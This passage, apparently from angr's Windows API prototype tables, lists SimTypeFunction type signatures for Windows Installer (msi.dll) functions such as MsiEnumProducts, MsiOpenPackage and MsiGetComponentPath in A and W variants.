'MsiDetermineApplicablePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductPackagePath", "cPatchInfo", "pPatchInfo"]),
#
'MsiDetermineApplicablePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Char"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductPackagePath", "cPatchInfo", "pPatchInfo"]),
#
'MsiEnumPatchesExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwFilter", "dwIndex", "szPatchCode", "szTargetProductCode", "pdwTargetProductContext", "szTargetUserSid", "pcchTargetUserSid"]),
#
'MsiEnumPatchesExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwFilter", "dwIndex", "szPatchCode", "szTargetProductCode", "pdwTargetProductContext", "szTargetUserSid", "pcchTargetUserSid"]),
#
'MsiQueryFeatureStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiQueryFeatureStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiQueryFeatureStateExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szFeature", "pdwState"]),
#
'MsiQueryFeatureStateExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szFeature", "pdwState"]),
#
'MsiUseFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiUseFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiUseFeatureExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature", "dwInstallMode", "dwReserved"]),
#
'MsiUseFeatureExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature", "dwInstallMode", "dwReserved"]),
#
'MsiGetFeatureUsageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "pdwUseCount", "pwDateUsed"]),
#
'MsiGetFeatureUsageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "pdwUseCount", "pwDateUsed"]),
#
'MsiConfigureFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "eInstallState"]),
#
'MsiConfigureFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "eInstallState"]),
#
'MsiReinstallFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "dwReinstallMode"]),
#
'MsiReinstallFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "dwReinstallMode"]),
#
'MsiProvideComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "szComponent", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "szComponent", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "szProduct", "dwUnused1", "dwUnused2", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "szProduct", "dwUnused1", "dwUnused2", "lpPathBuf", "pcchPathBuf"]),
#
'MsiGetComponentPathA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiGetComponentPathW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiGetComponentPathExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProductCode", "szComponentCode", "szUserSid", "dwContext", "lpOutPathBuffer", "pcchOutPathBuffer"]),
#
'MsiGetComponentPathExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProductCode", "szComponentCode", "szUserSid", "dwContext", "lpOutPathBuffer", "pcchOutPathBuffer"]),
#
'MsiProvideAssemblyA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypeInt(signed=False, label="MSIASSEMBLYINFO"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szAssemblyName", "szAppContext", "dwInstallMode", "dwAssemblyInfo", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideAssemblyW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypeInt(signed=False, label="MSIASSEMBLYINFO"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szAssemblyName", "szAppContext", "dwInstallMode", "dwAssemblyInfo", "lpPathBuf", "pcchPathBuf"]),
#
'MsiQueryComponentStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szComponentCode", "pdwState"]),
#
'MsiQueryComponentStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szComponentCode", "pdwState"]),
#
'MsiEnumProductsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iProductIndex", "lpProductBuf"]),
#
'MsiEnumProductsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iProductIndex", "lpProductBuf"]),
#
'MsiEnumProductsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwIndex", "szInstalledProductCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumProductsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwIndex", "szInstalledProductCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumRelatedProductsA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpUpgradeCode", "dwReserved", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumRelatedProductsW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpUpgradeCode", "dwReserved", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumFeaturesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iFeatureIndex", "lpFeatureBuf", "lpParentBuf"]),
#
'MsiEnumFeaturesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iFeatureIndex", "lpFeatureBuf", "lpParentBuf"]),
#
'MsiEnumComponentsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iComponentIndex", "lpComponentBuf"]),
#
'MsiEnumComponentsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iComponentIndex", "lpComponentBuf"]),
#
'MsiEnumComponentsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szUserSid", "dwContext", "dwIndex", "szInstalledComponentCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumComponentsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szUserSid", "dwContext", "dwIndex", "szInstalledComponentCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumClientsA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumClientsW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumClientsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "szUserSid", "dwContext", "dwProductIndex", "szProductBuf", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumClientsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "szUserSid", "dwContext", "dwProductIndex", "szProductBuf", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumComponentQualifiersA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iIndex", "lpQualifierBuf", "pcchQualifierBuf", "lpApplicationDataBuf", "pcchApplicationDataBuf"]),
#
'MsiEnumComponentQualifiersW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iIndex", "lpQualifierBuf", "pcchQualifierBuf", "lpApplicationDataBuf", "pcchApplicationDataBuf"]),
#
'MsiOpenProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "hProduct"]),
#
'MsiOpenProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "hProduct"]),
#
'MsiOpenPackageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "hProduct"]),
#
'MsiOpenPackageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "hProduct"]),
#
'MsiOpenPackageExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "dwOptions", "hProduct"]),
#
'MsiOpenPackageExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "dwOptions", "hProduct"]),
#
'MsiGetPatchFileListA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szPatchPackages", "pcFiles", "pphFileRecords"]),
#
'MsiGetPatchFileListW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szPatchPackages", "pcFiles", "pphFileRecords"]),
#
'MsiGetProductPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szProperty", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szProperty", "lpValueBuf", "pcchValueBuf"]),
#
'MsiVerifyPackageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath"]),
#
'MsiVerifyPackageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath"]),
#
'MsiGetFeatureInfoA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szFeature", "lpAttributes", "lpTitleBuf", "pcchTitleBuf", "lpHelpBuf", "pcchHelpBuf"]),
#
'MsiGetFeatureInfoW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szFeature", "lpAttributes", "lpTitleBuf", "pcchTitleBuf", "lpHelpBuf", "pcchHelpBuf"]),
#
'MsiInstallMissingComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szComponent", "eInstallState"]),
#
'MsiInstallMissingComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szComponent", "eInstallState"]),
#
'MsiInstallMissingFileA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFile"]),
#
'MsiInstallMissingFileW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFile"]),
#
